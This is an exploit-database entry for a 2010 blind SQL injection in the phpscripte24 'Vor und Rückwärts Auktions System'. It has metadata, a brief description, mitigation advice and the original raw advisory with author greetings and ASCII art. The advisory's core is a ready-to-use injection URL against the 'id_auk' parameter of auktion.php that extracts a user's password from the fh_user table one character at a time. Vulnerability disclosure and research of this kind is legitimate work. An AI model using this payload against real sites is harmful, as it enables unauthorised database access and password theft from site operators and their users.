phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection auktion.php

vendor:

Vor und Rückwärts Auktions System

by:

Easy Laster

8,8

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Vor und Rückwärts Auktions System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection auktion.php

A Blind SQL Injection vulnerability exists in the phpscripte24 Vor und Rückwärts Auktions System, which allows an attacker to extract sensitive information from the database. The vulnerability is located in the 'auktion.php' script when processing the 'id_auk' parameter. An attacker can inject malicious SQL queries to extract sensitive information from the database. This can be exploited to gain access to the database and extract sensitive information such as passwords.

Mitigation:

The vendor recommends to update to the latest version of the phpscripte24 Vor und Rückwärts Auktions System. Additionally, it is recommended to use an input validation filter to prevent malicious SQL queries from being injected.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection auktion.php
+Autor : Easy Laster
+Date   : 02.04.2010
+Script  : phpscripte24Vor und Rückwärts Auktions System
+Price : € 299.00
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktion/auktion.php?id_auk=

#password
+Exploitable   : http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1

-----------------------------------------------------------------------------------------